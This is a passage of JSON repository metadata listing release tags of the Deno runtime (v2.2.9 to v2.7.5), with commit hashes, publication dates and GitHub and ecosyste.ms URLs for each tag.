:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_